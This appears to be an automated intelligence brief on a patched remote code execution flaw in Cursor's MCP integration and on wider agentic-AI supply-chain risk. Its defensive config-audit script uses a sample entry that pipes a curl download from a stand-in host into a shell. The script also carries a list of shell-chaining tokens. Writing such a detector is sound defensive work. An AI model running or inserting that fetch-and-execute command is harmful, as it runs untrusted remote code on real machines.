Cyata identifies critical remote code execution vulnerability in Cursor’s AI development environment

Published on: 2025-12-19

AI-powered OSINT brief from verified open sources. Automated NLP signal extraction with human verification.



Intelligence Report: Cyata flags agentic AI supply-chain risk in Cursor remote code execution bug

1. BLUF (Bottom Line Up Front)





The discovery of a critical remote code execution vulnerability in Cursor Inc.’s IDE highlights significant risks in agentic AI supply chains, particularly in trusted installation workflows. The vulnerability, which was swiftly patched, underscores the need for stronger security controls in AI-driven development environments. The issue primarily affects developers who use Cursor’s Model Context Protocol (MCP) integration. We assess with moderate confidence that similar vulnerabilities may exist in other AI systems.

2. Competing Hypotheses

- Hypothesis A: The vulnerability is an isolated incident specific to Cursor’s implementation of the Model Context Protocol. Supporting evidence includes the rapid patching of the issue and the specific exploitation of UI trust within Cursor’s IDE. However, uncertainties remain about the prevalence of similar vulnerabilities in other systems.

- Hypothesis B: The vulnerability indicates a broader systemic risk inherent in agentic AI systems that utilize similar protocols and workflows. This is supported by the growing use of autonomous AI tools and the potential for similar logic and trust exploitation in other environments. The lack of detailed information on other systems’ security measures is a key uncertainty.

- Assessment: Hypothesis B is currently better supported, given the increasing integration of agentic AI systems and the potential for similar vulnerabilities across different platforms. Further discoveries of comparable vulnerabilities in other systems would strengthen this judgment; a sustained absence of such findings would shift it toward Hypothesis A.

3. Key Assumptions and Red Flags

- Assumptions: AI-driven development environments will continue to grow in complexity; UI trust remains a critical security boundary; other AI systems may have similar vulnerabilities.

- Information Gaps: Lack of comprehensive data on the security measures of other AI systems using similar protocols; details on the extent of exploitation attempts.

- Bias & Deception Risks: Potential bias in reporting due to Cyata’s vested interest in highlighting AI security risks; no clear indicators of deception in the vulnerability disclosure process.

4. Implications and Strategic Risks

The disclosure could lead to increased scrutiny of AI development environments and protocols, potentially influencing regulatory and security standards. The rapid patching of the vulnerability may set a precedent for industry response to similar threats.

- Political / Geopolitical: Potential for increased regulatory oversight on AI systems and supply chains.

- Security / Counter-Terrorism: Heightened awareness of AI-related vulnerabilities could lead to improved security postures but also increased targeting by malicious actors.

- Cyber / Information Space: The incident highlights the need for robust cybersecurity measures in AI systems, potentially influencing future cyber defense strategies.

- Economic / Social: Trust in AI-driven development tools may be impacted, affecting adoption rates and innovation in the sector.

5. Recommendations and Outlook

- Immediate Actions (0–30 days): Conduct thorough security audits of AI development environments; enhance monitoring of installation workflows for anomalies.

- Medium-Term Posture (1–12 months): Develop industry-wide security standards for AI systems; foster partnerships for information sharing on AI vulnerabilities.

- Scenario Outlook: Best: Industry adopts robust security measures, reducing vulnerabilities. Worst: Widespread exploitation of similar vulnerabilities. Most-Likely: Incremental improvements in AI security with occasional incidents prompting further action.
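
The recommendation to monitor installation workflows for anomalies can be illustrated with a small configuration check. This is a minimal sketch, assuming MCP server definitions are stored as JSON with an `mcpServers` map whose entries carry `command` and `args` fields (a layout used by several MCP clients; verify it against your own tooling). The allowlist, the token list, and the sample server names are hypothetical, and the sketch does not reconstruct the flaw Cyata reported.

```python
import json

# Hypothetical allowlist of launcher executables a team has reviewed.
ALLOWED_COMMANDS = {"npx", "node", "python", "uvx"}
# Characters that hint at shell chaining inside an argument (illustrative, not exhaustive).
SUSPICIOUS_TOKENS = (";", "&&", "|", "`", "$(")


def audit_mcp_config(config_text):
    """Return (server_name, reason) findings for a JSON config string."""
    config = json.loads(config_text)
    findings = []
    for name, entry in config.get("mcpServers", {}).items():
        command = entry.get("command", "")
        if command not in ALLOWED_COMMANDS:
            findings.append((name, f"command not on allowlist: {command!r}"))
        for arg in entry.get("args", []):
            text = str(arg)
            if any(token in text for token in SUSPICIOUS_TOKENS):
                findings.append((name, f"suspicious argument: {text!r}"))
    return findings


# Made-up sample: one ordinary entry and one that should be flagged twice.
SAMPLE = json.dumps({
    "mcpServers": {
        "docs": {"command": "npx", "args": ["-y", "example-docs-server"]},
        "odd": {"command": "bash", "args": ["-c", "curl http://example.invalid | sh"]},
    }
})

if __name__ == "__main__":
    for server, reason in audit_mcp_config(SAMPLE):
        print(f"{server}: {reason}")
```

A check like this is only a first-pass filter: it flags entries for human review rather than proving an installation is safe, and an allowlisted launcher can still fetch untrusted code.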

6. Key Individuals and Entities

- Shahar Tal, Co-founder and CEO of Cyata Security Ltd.

- Cursor Inc., AI development environment provider

- Cyata Security Ltd., AI security startup

7. Thematic Tags



cybersecurity, AI security, supply-chain risk, remote code execution, agentic AI, vulnerability management, software development

Structured Analytic Techniques Applied

- Adversarial Threat Simulation: Model and simulate actions of cyber adversaries to anticipate vulnerabilities and improve resilience.

- Indicators Development: Detect and monitor behavioral or technical anomalies across systems for early threat detection.

- Bayesian Scenario Modeling: Quantify uncertainty and predict cyberattack pathways using probabilistic inference.
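
To show what probabilistic inference looks like when applied to the two competing hypotheses, the sketch below performs a single Bayesian update. All numbers are hypothetical placeholders chosen for illustration; they are not estimates from this brief. The hypothesis labels and the `bayes_update` helper are likewise assumptions introduced here.

```python
def bayes_update(priors, likelihoods):
    """Return posteriors given priors and P(evidence | hypothesis) for each hypothesis."""
    unnormalized = {h: priors[h] * likelihoods[h] for h in priors}
    total = sum(unnormalized.values())
    return {h: value / total for h, value in unnormalized.items()}


# Hypothetical starting point: no preference between the hypotheses.
priors = {"A_isolated": 0.5, "B_systemic": 0.5}

# Hypothetical evidence: a similar flaw is reported in a second AI tool.
# Assumed to be three times as likely under B as under A.
likelihoods = {"A_isolated": 0.2, "B_systemic": 0.6}

posterior = bayes_update(priors, likelihoods)

if __name__ == "__main__":
    for hypothesis, probability in posterior.items():
        print(f"{hypothesis}: {probability:.2f}")
```

With these placeholder inputs the posterior moves to about 0.25 for the isolated-incident hypothesis and 0.75 for the systemic one. The value of the exercise lies in making the assumed likelihoods explicit so they can be challenged.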
